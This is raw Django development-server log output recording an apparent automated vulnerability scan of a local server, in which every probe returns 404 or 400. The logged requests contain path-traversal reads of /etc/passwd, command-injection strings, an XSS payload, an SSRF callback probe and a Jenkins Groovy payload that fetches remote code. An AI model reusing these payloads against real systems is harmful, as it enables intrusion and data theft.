[07/Nov/2020 22:20:17] "GET /vtigercrm HTTP/1.1" 404 2199
Not Found: /crm
[07/Nov/2020 22:20:17] "GET /crm HTTP/1.1" 404 2181
Not Found: /horde/services/javascript.php
[07/Nov/2020 22:20:18] "POST /horde/services/javascript.php HTTP/1.1" 404 2260
Not Found: /index.cfm
[07/Nov/2020 22:20:18] "GET /index.cfm?Mode=debug HTTP/1.1" 404 2205
Not Found: /index.cfml
[07/Nov/2020 22:20:18] "GET /index.cfml?Mode=debug HTTP/1.1" 404 2208
Not Found: /home.cfm
[07/Nov/2020 22:20:18] "GET /home.cfm?Mode=debug HTTP/1.1" 404 2202
Not Found: /home.cfml
[07/Nov/2020 22:20:18] "GET /home.cfml?Mode=debug HTTP/1.1" 404 2205
Not Found: /default.cfml
[07/Nov/2020 22:20:18] "GET /default.cfml?Mode=debug HTTP/1.1" 404 2214
Not Found: /default.cfm
[07/Nov/2020 22:20:18] "GET /default.cfm?Mode=debug HTTP/1.1" 404 2211
Not Found: /cgi-bin/
[07/Nov/2020 22:20:19] "GET /cgi-bin/?Mode=debug HTTP/1.1" 404 2202
Not Found: /scripts/
[07/Nov/2020 22:20:20] "GET /scripts/?Mode=debug HTTP/1.1" 404 2202
Not Found: /cgi-bin/bb-hist.sh
[07/Nov/2020 22:20:22] "GET /cgi-bin/bb-hist.sh?HISTFILE=../../../../../etc/passwd HTTP/1.1" 404 2256
Not Found: /scripts/bb-hist.sh
[07/Nov/2020 22:20:22] "GET /scripts/bb-hist.sh?HISTFILE=../../../../../etc/passwd HTTP/1.1" 404 2256
Not Found: /
[07/Nov/2020 22:20:23] "GET / HTTP/1.1" 404 2154
Not Found: /update.php
[07/Nov/2020 22:20:23] "GET /update.php?op=info HTTP/1.1" 404 2210
Not Found: /drupal
[07/Nov/2020 22:20:23] "GET /drupal HTTP/1.1" 404 2190
Not Found: /drupal/update.php
[07/Nov/2020 22:20:23] "GET /drupal/update.php?op=info HTTP/1.1" 404 2231
Not Found: /
[07/Nov/2020 22:20:24] "GET / HTTP/1.1" 404 2149
Not Found: /oozie/
[07/Nov/2020 22:20:26] "GET /oozie/ HTTP/1.1" 404 2190
Not Found: /cgi-bin/auktion.cgi
[07/Nov/2020 22:20:26] "GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.1" 404 2268
Not Found: /scripts/auktion.cgi
[07/Nov/2020 22:20:28] "GET /scripts/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.1" 404 2268
Not Found: /phpMyAdmin/db_details_importdocsql.php
[07/Nov/2020 22:20:28] "GET /phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=./ HTTP/1.0" 404 2327
Not Found: /users.php
[07/Nov/2020 22:20:32] "GET /users.php HTTP/1.1" 404 2194
[07/Nov/2020 22:20:33] code 400, message Bad request syntax ('GET /index.php/module/action/param1/${@print(base64_decode(%s))} % base64_str HTTP/1.1')
Not Found: /geeklog/users.php
[07/Nov/2020 22:20:33] "GET /index.php/module/action/param1/${@print(base64_decode(%s))} % base64_str HTTP/1.1" 400 -
[07/Nov/2020 22:20:33] "GET /geeklog/users.php HTTP/1.1" 404 2218
Not Found: /geeklog/public_html/users.php
[07/Nov/2020 22:20:33] "GET /geeklog/public_html/users.php HTTP/1.1" 404 2254
Not Found: /weblog/public_html/users.php
[07/Nov/2020 22:20:33] "GET /weblog/public_html/users.php HTTP/1.1" 404 2251
Not Found: /geeklog-1.3.5sr2/public_html/users.php
[07/Nov/2020 22:20:33] "GET /geeklog-1.3.5sr2/public_html/users.php HTTP/1.1" 404 2281
Not Found: /flex2gateway/amf
[07/Nov/2020 22:20:34] "POST /flex2gateway/amf HTTP/1.1" 404 2221
Not Found: /_plugin/test/
[07/Nov/2020 22:20:35] "GET /_plugin/test/ HTTP/1.0" 404 2206
Not Found: /cfanywhere/index.html
[07/Nov/2020 22:20:35] "GET /cfanywhere/index.html HTTP/1.1" 404 2230
Not Found: /_plugin/kopf/
[07/Nov/2020 22:20:35] "GET /_plugin/kopf/ HTTP/1.0" 404 2206
Not Found: /_plugin/HQ/
[07/Nov/2020 22:20:35] "GET /_plugin/HQ/ HTTP/1.0" 404 2200
Not Found: /_plugin/marvel/
[07/Nov/2020 22:20:35] "GET /_plugin/marvel/ HTTP/1.0" 404 2212
Not Found: /_plugin/bigdesk/
[07/Nov/2020 22:20:35] "GET /_plugin/bigdesk/ HTTP/1.0" 404 2215
Not Found: /_plugin/head/
[07/Nov/2020 22:20:35] "GET /_plugin/head/ HTTP/1.0" 404 2206
Not Found: /nosuchfile-10303-10310.php3
[07/Nov/2020 22:20:35] "GET /nosuchfile-10303-10310.php3 HTTP/1.1" 404 2248
Not Found: /docs/servlets/index.html
[07/Nov/2020 22:20:35] "GET /docs/servlets/index.html HTTP/1.1" 404 2239
Not Found: /cgi-bin/cvsweb.cgi
[07/Nov/2020 22:20:35] "GET /cgi-bin/cvsweb.cgi HTTP/1.1" 404 2221
Not Found: /jsp/index.html
[07/Nov/2020 22:20:35] "GET /jsp/index.html HTTP/1.1" 404 2209
Not Found: /webl/index.html
[07/Nov/2020 22:20:35] "GET /webl/index.html HTTP/1.1" 404 2212
Not Found: /scripts/cvsweb.cgi
[07/Nov/2020 22:20:36] "GET /scripts/cvsweb.cgi HTTP/1.1" 404 2221
Not Found: /
[07/Nov/2020 22:20:38] "GET / HTTP/1.1" 404 2154
Not Found: /irpt/i/serverlogAction.do
[07/Nov/2020 22:20:38] "GET /irpt/i/serverlogAction.do?input=def&cfrom=# HTTP/1.1" 404 2264
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 55238)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: //
[07/Nov/2020 22:20:41] "GET //?nf-switcher=upgrade HTTP/1.1" 404 2195
Not Found: /wordpress/
[07/Nov/2020 22:20:41] "GET /wordpress/?nf-switcher=rollback HTTP/1.1" 404 2223
Not Found: /wordpress/
[07/Nov/2020 22:20:41] "GET /wordpress/?nf-switcher=upgrade HTTP/1.1" 404 2222
Not Found: /wordpress/
[07/Nov/2020 22:20:41] "GET /wordpress/?nf-switcher=rollback HTTP/1.1" 404 2223
Not Found: /webcalendar/week.php
[07/Nov/2020 22:20:42] "POST /webcalendar/week.php HTTP/1.0" 404 2228
Not Found: /cgi-local/shop.pl/page=;cat shop.pl|
[07/Nov/2020 22:20:42] "GET /cgi-local/shop.pl/page=;cat%20shop.pl| HTTP/1.1" 404 2283
Not Found: /cgi_bin/shop.pl/page=;cat shop.pl|
[07/Nov/2020 22:20:43] "GET /cgi_bin/shop.pl/page=;cat%20shop.pl| HTTP/1.1" 404 2277
Not Found: /cgi-bin/shop.pl/page=;cat shop.pl|
[07/Nov/2020 22:20:43] "GET /cgi-bin/shop.pl/page=;cat%20shop.pl| HTTP/1.1" 404 2277
Not Found: /scripts/shop.pl/page=;cat shop.pl|
[07/Nov/2020 22:20:43] "GET /scripts/shop.pl/page=;cat%20shop.pl| HTTP/1.1" 404 2277
Not Found: /
[07/Nov/2020 22:20:43] "GET / HTTP/1.1" 404 2154
Not Found: /nagios/main.php
[07/Nov/2020 22:20:44] "GET /nagios/main.php HTTP/1.1" 404 2217
Not Found: /main.php
[07/Nov/2020 22:20:44] "GET /main.php HTTP/1.1" 404 2196
Not Found: /
[07/Nov/2020 22:20:45] "GET / HTTP/1.1" 404 2154
Not Found: /otrs/
[07/Nov/2020 22:20:45] "GET /otrs/ HTTP/1.1" 404 2187
Not Found: /wordpress/
[07/Nov/2020 22:20:46] "GET /wordpress/ HTTP/1.1" 404 2202
Not Found: /blog/
[07/Nov/2020 22:20:46] "GET /blog/ HTTP/1.1" 404 2187
Not Found: /phpBB/admin/admin_styles.php
[07/Nov/2020 22:20:48] "POST /phpBB/admin/admin_styles.php?mode=addnew HTTP/1.0" 404 2264
Not Found: /shoutbox/shoutbox.php
[07/Nov/2020 22:20:49] "POST /shoutbox/shoutbox.php HTTP/1.1" 404 2231
Not Found: /RsasTest700211847.html
[07/Nov/2020 22:20:49] "GET /RsasTest700211847.html HTTP/1.1" 404 2233
Not Found: /configurations.do
[07/Nov/2020 22:20:49] "GET /configurations.do HTTP/1.1" 404 2223
Not Found: /status.php3
[07/Nov/2020 22:20:49] "GET /status.php3 HTTP/1.1" 404 2200
Not Found: /imp/status.php3
[07/Nov/2020 22:20:49] "GET /imp/status.php3 HTTP/1.1" 404 2212
Not Found: /horde/imp/status.php3
[07/Nov/2020 22:20:49] "GET /horde/imp/status.php3 HTTP/1.1" 404 2230
Not Found: /cgi-bin/Web_Store/web_store.cgi
[07/Nov/2020 22:20:50] "GET /cgi-bin/Web_Store/web_store.cgi?page=../../../../../../etc/passwd%00.html HTTP/1.1" 404 2302
Not Found: /RsasTest1634859688.html
[07/Nov/2020 22:20:50] "GET /RsasTest1634859688.html HTTP/1.1" 404 2236
Not Found: /
[07/Nov/2020 22:20:50] "GET / HTTP/1.1" 404 2149
Not Found: /nuke/
[07/Nov/2020 22:20:50] "GET /nuke/ HTTP/1.1" 404 2182
Not Found: /demo/
[07/Nov/2020 22:20:51] "GET /demo/ HTTP/1.1" 404 2182
Not Found: /scripts/Web_Store/web_store.cgi
[07/Nov/2020 22:20:51] "GET /scripts/Web_Store/web_store.cgi?page=../../../../../../etc/passwd%00.html HTTP/1.1" 404 2302
Not Found: /phpnuke/html/
[07/Nov/2020 22:20:51] "GET /phpnuke/html/ HTTP/1.1" 404 2206
Not Found: /php_nuke/html/
[07/Nov/2020 22:20:51] "GET /php_nuke/html/ HTTP/1.1" 404 2209
Not Found: /
[07/Nov/2020 22:20:51] "GET / HTTP/1.1" 404 2154
Not Found: /php/
[07/Nov/2020 22:20:51] "GET /php/ HTTP/1.1" 404 2179
Not Found: /phpnew/
[07/Nov/2020 22:20:51] "GET /phpnew/ HTTP/1.1" 404 2188
Not Found: /nuke50/
[07/Nov/2020 22:20:52] "GET /nuke50/ HTTP/1.1" 404 2188
Not Found: /nuke60/
[07/Nov/2020 22:20:52] "GET /nuke60/ HTTP/1.1" 404 2188
Not Found: /nuke65/
[07/Nov/2020 22:20:52] "GET /nuke65/ HTTP/1.1" 404 2188
Not Found: /servlets/GetChallengeServlet
[07/Nov/2020 22:20:52] "GET /servlets/GetChallengeServlet HTTP/1.1" 404 2256
Not Found: /
[07/Nov/2020 22:20:52] "GET / HTTP/1.1" 404 2154
Not Found: /cgi-bin/
[07/Nov/2020 22:20:54] "GET /cgi-bin/ HTTP/1.1" 404 2191
Not Found: /scripts/
[07/Nov/2020 22:20:55] "GET /scripts/ HTTP/1.1" 404 2191
Not Found: /uilogonsubmit.jsp
[07/Nov/2020 22:20:55] "POST /uilogonsubmit.jsp HTTP/1.1" 404 2224
Not Found: /phpMyAdmin/Documentation.html
[07/Nov/2020 22:20:55] "GET /phpMyAdmin/Documentation.html HTTP/1.1" 404 2259
Not Found: /phpMyAdmin/doc/html/index.html
[07/Nov/2020 22:20:56] "GET /phpMyAdmin/doc/html/index.html HTTP/1.1" 404 2262
Not Found: /phpmyadmin/Documentation.html
[07/Nov/2020 22:20:56] "GET /phpmyadmin/Documentation.html HTTP/1.1" 404 2259
Not Found: /phpmyadmin/doc/html/index.html
[07/Nov/2020 22:20:56] "GET /phpmyadmin/doc/html/index.html HTTP/1.1" 404 2262
Not Found: /pma/Documentation.html
[07/Nov/2020 22:20:56] "GET /pma/Documentation.html HTTP/1.1" 404 2238
Not Found: /pma/doc/html/index.html
[07/Nov/2020 22:20:56] "GET /pma/doc/html/index.html HTTP/1.1" 404 2241
Not Found: /cgi-bin/Documentation.html
[07/Nov/2020 22:20:56] "GET /cgi-bin/Documentation.html HTTP/1.1" 404 2250
Not Found: /cgi-bin/doc/html/index.html
[07/Nov/2020 22:20:56] "GET /cgi-bin/doc/html/index.html HTTP/1.1" 404 2253
Not Found: /scripts/Documentation.html
[07/Nov/2020 22:20:57] "GET /scripts/Documentation.html HTTP/1.1" 404 2250
Not Found: /scripts/doc/html/index.html
[07/Nov/2020 22:20:57] "GET /scripts/doc/html/index.html HTTP/1.1" 404 2253
Not Found: /Documentation.html
[07/Nov/2020 22:20:57] "GET /Documentation.html HTTP/1.1" 404 2226
Not Found: /doc/html/index.html
[07/Nov/2020 22:20:57] "GET /doc/html/index.html HTTP/1.1" 404 2229
Not Found: /administrator/index.php
[07/Nov/2020 22:21:04] "GET /administrator/index.php HTTP/1.1" 404 2241
Not Found: /index.php
[07/Nov/2020 22:21:04] "GET /index.php HTTP/1.1" 404 2199
Not Found: /joomla/administrator/index.php
[07/Nov/2020 22:21:04] "GET /joomla/administrator/index.php HTTP/1.1" 404 2262
Not Found: /joomla/index.php
[07/Nov/2020 22:21:04] "GET /joomla/index.php HTTP/1.1" 404 2220
Not Found: /joomla2/administrator/index.php
[07/Nov/2020 22:21:04] "GET /joomla2/administrator/index.php HTTP/1.1" 404 2265
Not Found: /joomla2/index.php
[07/Nov/2020 22:21:04] "GET /joomla2/index.php HTTP/1.1" 404 2223
Not Found: /joomla3/administrator/index.php
[07/Nov/2020 22:21:04] "GET /joomla3/administrator/index.php HTTP/1.1" 404 2265
Not Found: /joomla3/index.php
[07/Nov/2020 22:21:04] "GET /joomla3/index.php HTTP/1.1" 404 2223
Not Found: /content/administrator/index.php
[07/Nov/2020 22:21:04] "GET /content/administrator/index.php HTTP/1.1" 404 2265
Not Found: /content/index.php
[07/Nov/2020 22:21:04] "GET /content/index.php HTTP/1.1" 404 2223
Not Found: /cms/administrator/index.php
[07/Nov/2020 22:21:04] "GET /cms/administrator/index.php HTTP/1.1" 404 2253
Not Found: /cms/index.php
[07/Nov/2020 22:21:04] "GET /cms/index.php HTTP/1.1" 404 2211
Invalid HTTP_HOST header: ''. The domain name provided is not valid according to RFC 1034/1035.
Not Found: /index.php
[07/Nov/2020 22:21:04] "GET /index.php HTTP/1.1" 404 2194
Not Found: /solr/
[07/Nov/2020 22:21:04] "GET /solr/ HTTP/1.1" 404 2187
Bad Request: /etc/passwd
Not Found: /
[07/Nov/2020 22:21:05] "GET / HTTP/1.1" 404 2154
[07/Nov/2020 22:21:05] "GET /etc/passwd HTTP/1.1" 400 62013
Not Found: //wv6GP4Ix
[07/Nov/2020 22:21:06] "GET //wv6GP4Ix HTTP/1.1" 404 2199
Not Found: /
[07/Nov/2020 22:21:07] "POST /?routestring=ajax/render/widget_php HTTP/1.1" 404 2190
Not Found: /vb5/
[07/Nov/2020 22:21:07] "POST /vb5/?routestring=ajax/render/widget_php HTTP/1.1" 404 2220
Not Found: /vb/
[07/Nov/2020 22:21:08] "POST /vb/?routestring=ajax/render/widget_php HTTP/1.1" 404 2217
Not Found: /vBulletin/
[07/Nov/2020 22:21:08] "POST /vBulletin/?routestring=ajax/render/widget_php HTTP/1.1" 404 2238
Not Found: /api/users
[07/Nov/2020 22:21:08] "POST /api/users HTTP/1.1" 404 2200
Not Found: /password_change.cgi
[07/Nov/2020 22:21:09] "POST /password_change.cgi HTTP/1.1" 404 2230
Not Found: /cgi-bin/apexec.pl
[07/Nov/2020 22:21:12] "GET /cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd%00.html&passurl=/category/ HTTP/1.1" 404 2310
Not Found: /scripts/apexec.pl
[07/Nov/2020 22:21:12] "GET /scripts/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd%00.html&passurl=/category/ HTTP/1.1" 404 2310
Not Found: /index.php
[07/Nov/2020 22:21:14] "GET /index.php HTTP/1.1" 404 2199
Not Found: /login.jsp
[07/Nov/2020 22:21:16] "GET /login.jsp?url=%2Findex.jsp HTTP/1.1" 404 2216
Not Found: /
[07/Nov/2020 22:21:20] "GET / HTTP/1.1" 404 2154
Not Found: /tree
[07/Nov/2020 22:21:59] "GET /tree HTTP/1.1" 404 2184
Not Found: /
[07/Nov/2020 22:22:05] "HEAD / HTTP/1.0" 404 2155
Not Found: /secure/Dashboard.jspa
[07/Nov/2020 22:22:22] "GET /secure/Dashboard.jspa HTTP/1.1" 404 2235
Not Found: /jira/secure/Dashboard.jspa
[07/Nov/2020 22:22:22] "GET /jira/secure/Dashboard.jspa HTTP/1.1" 404 2250
Not Found: / 
[07/Nov/2020 22:22:26] "GET /%00 HTTP/1.1" 404 2172
Not Found: /RPC2
[07/Nov/2020 22:22:26] "POST /RPC2 HTTP/1.1" 404 2185
Not Found: /
[07/Nov/2020 22:22:26] "GET / HTTP/1.1" 404 2154
Not Found: /confluence
[07/Nov/2020 22:22:26] "GET /confluence HTTP/1.1" 404 2202
Not Found: /havalite/havalite/upload.php
[07/Nov/2020 22:22:28] "POST /havalite/havalite/upload.php HTTP/1.0" 404 2252
Not Found: /havalite/havalite/tmp/files/abcdef1234.php
[07/Nov/2020 22:22:28] "GET /havalite/havalite/tmp/files/abcdef1234.php HTTP/1.1" 404 2298
Not Found: /havalite/havalite/tmp/files/sh.php
[07/Nov/2020 22:22:28] "GET /havalite/havalite/tmp/files/sh.php HTTP/1.1" 404 2274
Not Found: /
[07/Nov/2020 22:22:28] "GET / HTTP/1.1" 404 2154
Not Found: /plugins/servlet/gadgets/makeRequest
[07/Nov/2020 22:22:30] "GET /plugins/servlet/gadgets/makeRequest?url=http://172.16.4.4:8000@192.168.199.130:63130/LI3P8FgV HTTP/1.1" 404 2335
Not Found: /DoLogin
[07/Nov/2020 22:22:30] "GET /DoLogin HTTP/1.1" 404 2193
Not Found: / /
[07/Nov/2020 22:22:32] "GET /%00/ HTTP/1.1" 404 2175
Not Found: /
[07/Nov/2020 22:22:32] "POST / HTTP/1.1" 404 2155
Not Found: /twiki/bin/view
[07/Nov/2020 22:22:32] "POST /twiki/bin/view HTTP/1.0" 404 2210
Not Found: /
[07/Nov/2020 22:22:33] "POST / HTTP/1.1" 404 2155
Not Found: /bin/view
[07/Nov/2020 22:22:33] "POST /bin/view HTTP/1.0" 404 2192
Not Found: /cgi-bin/htsearch
[07/Nov/2020 22:22:34] "GET /cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words= HTTP/1.1" 404 2325
Not Found: /scripts/htsearch
[07/Nov/2020 22:22:34] "GET /scripts/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words= HTTP/1.1" 404 2325
Not Found: /cgi_bin/htsearch
[07/Nov/2020 22:22:34] "GET /cgi_bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words= HTTP/1.1" 404 2325
[07/Nov/2020 22:22:34] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03B\x04\x94\x94\x00\x02\x8c6\x80lêª\x99\x8eÖB\x8fWªF\x16')
[07/Nov/2020 22:22:34] You're accessing the development server over HTTPS, but it only supports HTTP.

Not Found: /htsearch
[07/Nov/2020 22:22:34] "GET /htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words= HTTP/1.1" 404 2301
Not Found: /cgi/htsearch
[07/Nov/2020 22:22:34] "GET /cgi/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words= HTTP/1.1" 404 2313
Not Found: /cgi-bin/twiki/bin/view
[07/Nov/2020 22:22:34] "POST /cgi-bin/twiki/bin/view HTTP/1.0" 404 2234
Not Found: /
[07/Nov/2020 22:22:36] "POST / HTTP/1.0" 404 2150
Not Found: /
[07/Nov/2020 22:22:37] "GET / HTTP/1.1" 404 2154
Not Found: /RsasTest2093667546.html
[07/Nov/2020 22:22:38] "GET /RsasTest2093667546.html HTTP/1.1" 404 2236
Not Found: /cgi-bin/htsearch
[07/Nov/2020 22:22:38] "GET /cgi-bin/htsearch?exclude=%60/etc/passwd%60 HTTP/1.1" 404 2241
Not Found: /scripts/htsearch
[07/Nov/2020 22:22:38] "GET /scripts/htsearch?exclude=%60/etc/passwd%60 HTTP/1.1" 404 2241
Not Found: /cgi-bin/info2www
[07/Nov/2020 22:22:38] "GET /cgi-bin/info2www HTTP/1.1" 404 2215
Not Found: /scripts/info2www
[07/Nov/2020 22:22:38] "GET /scripts/info2www HTTP/1.1" 404 2215
Not Found: /
[07/Nov/2020 22:22:39] "GET / HTTP/1.1" 404 2154
Not Found: /pls/help/<SCRIPT>alert(document.domain)</SCRIPT>
[07/Nov/2020 22:22:40] "GET /pls/help/<SCRIPT>alert(document.domain)</SCRIPT> HTTP/1.1" 404 2343
Not Found: /soapdocs/ReleaseNotes.html
[07/Nov/2020 22:22:41] "GET /soapdocs/ReleaseNotes.html HTTP/1.1" 404 2245
Not Found: /soapdocs/docs/apiDocs/packages.html
[07/Nov/2020 22:22:41] "GET /soapdocs/docs/apiDocs/packages.html HTTP/1.1" 404 2272
Not Found: /index.php
[07/Nov/2020 22:22:42] "GET /index.php HTTP/1.1" 404 2199
Not Found: /joomla/index.php
[07/Nov/2020 22:22:42] "GET /joomla/index.php HTTP/1.1" 404 2220
Not Found: /joomla2/index.php
[07/Nov/2020 22:22:42] "GET /joomla2/index.php HTTP/1.1" 404 2223
Not Found: /soapdocs/docs/apiDocs/org.apache.soap.util.xml.XMISerializer.html
[07/Nov/2020 22:22:42] "GET /soapdocs/docs/apiDocs/org.apache.soap.util.xml.XMISerializer.html HTTP/1.1" 404 2362
Not Found: /joomla3/index.php
[07/Nov/2020 22:22:42] "GET /joomla3/index.php HTTP/1.1" 404 2223
Not Found: /support/common.php
[07/Nov/2020 22:22:42] "GET /support/common.php?f=0&ForumLang=../../../../../../../etc/passwd HTTP/1.1" 404 2271
Not Found: /common.php
[07/Nov/2020 22:22:43] "GET /common.php?f=0&ForumLang=../../../../../../../etc/passwd HTTP/1.1" 404 2247
Not Found: /cgi-bin/support/common.php
[07/Nov/2020 22:22:43] "GET /cgi-bin/support/common.php?f=0&ForumLang=../../../../../../../etc/passwd HTTP/1.1" 404 2295
Not Found: /cgi-bin/common.php
[07/Nov/2020 22:22:43] "GET /cgi-bin/common.php?f=0&ForumLang=../../../../../../../etc/passwd HTTP/1.1" 404 2271
Not Found: /pafiledb/includes/team/file.php
[07/Nov/2020 22:22:44] "GET /pafiledb/includes/team/file.php HTTP/1.0" 404 2260
Not Found: /scripts/support/common.php
[07/Nov/2020 22:22:44] "GET /scripts/support/common.php?f=0&ForumLang=../../../../../../../etc/passwd HTTP/1.1" 404 2295
Not Found: /scripts/common.php
[07/Nov/2020 22:22:44] "GET /scripts/common.php?f=0&ForumLang=../../../../../../../etc/passwd HTTP/1.1" 404 2271
Not Found: /api/systeminfo
[07/Nov/2020 22:22:45] "GET /api/systeminfo HTTP/1.1" 404 2214
Not Found: /
[07/Nov/2020 22:22:47] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:49] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:49] "PROPFIND / HTTP/1.1" 404 2154
Not Found: /opendir.php
[07/Nov/2020 22:22:50] "GET /opendir.php?/etc/passwd HTTP/1.1" 404 2212
Not Found: /cgi-bin/opendir.php
[07/Nov/2020 22:22:50] "GET /cgi-bin/opendir.php?/etc/passwd HTTP/1.1" 404 2236
Not Found: /
[07/Nov/2020 22:22:51] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:51] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:51] "GET / HTTP/1.1" 404 2154
Not Found: /scripts/opendir.php
[07/Nov/2020 22:22:51] "GET /scripts/opendir.php?/etc/passwd HTTP/1.1" 404 2236
Not Found: /
[07/Nov/2020 22:22:51] "GET / HTTP/1.1" 404 2154
Not Found: /dms0
[07/Nov/2020 22:22:51] "GET /dms0 HTTP/1.1" 404 2179
Not Found: /
[07/Nov/2020 22:22:51] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:51] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:51] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:51] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:51] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:51] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:51] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:51] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:51] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:52] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:52] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:52] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:52] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:52] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:52] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:52] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:22:52] "GET / HTTP/1.1" 404 2154
Not Found: /SilverStream
[07/Nov/2020 22:22:52] "GET /SilverStream HTTP/1.1" 404 2203
Not Found: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
[07/Nov/2020 22:22:55] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=%40GrabConfig%28disableChecksums%3Dtrue%29%0A%40GrabResolver%28name%3D%27r9dKn05m%27%2C+root%3D%27http%3A%2F%2F192.168.199.130%3A62154%27%29%0A%40Grab%28group%3D%27package%27%2C+module%3D%27r9dKn05m%27%2C+version%3D%271%27%29%0Aimport+Payload%3B%0A HTTP/1.1" 404 2766
Not Found: /
[07/Nov/2020 22:22:55] "GET / HTTP/1.1" 404 2154
Not Found: /pandora_console/
[07/Nov/2020 22:22:55] "GET /pandora_console/ HTTP/1.1" 404 2220
Not Found: /cgi-bin/YaBB.pl
[07/Nov/2020 22:22:57] "GET /cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../etc/passwd%00 HTTP/1.1" 404 2282
Not Found: /scripts/YaBB.pl
[07/Nov/2020 22:22:57] "GET /scripts/YaBB.pl?board=news&action=display&num=../../../../../../etc/passwd%00 HTTP/1.1" 404 2282
Not Found: /seeyon/htmlofficeservlet
[07/Nov/2020 22:22:59] "GET /seeyon/htmlofficeservlet HTTP/1.1" 404 2244
Invalid HTTP_HOST header: '172.16.4.4:8000,172.16.4.4'. The domain name provided is not valid according to RFC 1034/1035.
Bad Request: /
[07/Nov/2020 22:22:59] "GET / HTTP/1.1" 400 61985
Not Found: /modules.php
[07/Nov/2020 22:23:08] "GET /modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/passwd HTTP/1.1" 404 2321
Not Found: /cgi-bin/htgrep/file=index.html&hdr=/etc/passwd
[07/Nov/2020 22:23:08] "GET /cgi-bin/htgrep/file=index.html&hdr=/etc/passwd HTTP/1.1" 404 2321
Not Found: /nuke/modules.php
[07/Nov/2020 22:23:08] "GET /nuke/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/passwd HTTP/1.1" 404 2336
Not Found: /demo/modules.php
[07/Nov/2020 22:23:08] "GET /demo/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/passwd HTTP/1.1" 404 2336
Not Found: /phpnuke/html/modules.php
[07/Nov/2020 22:23:08] "GET /phpnuke/html/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/passwd HTTP/1.1" 404 2360
Not Found: /php_nuke/html/modules.php
[07/Nov/2020 22:23:08] "GET /php_nuke/html/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/passwd HTTP/1.1" 404 2363
Not Found: /php/modules.php
[07/Nov/2020 22:23:09] "GET /php/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/passwd HTTP/1.1" 404 2333
Not Found: /scripts/htgrep/file=index.html&hdr=/etc/passwd
[07/Nov/2020 22:23:09] "GET /scripts/htgrep/file=index.html&hdr=/etc/passwd HTTP/1.1" 404 2321
Not Found: /phpnew/modules.php
[07/Nov/2020 22:23:09] "GET /phpnew/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/passwd HTTP/1.1" 404 2342
Not Found: /nuke50/modules.php
[07/Nov/2020 22:23:09] "GET /nuke50/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/passwd HTTP/1.1" 404 2342
Not Found: /nuke50/modules.php
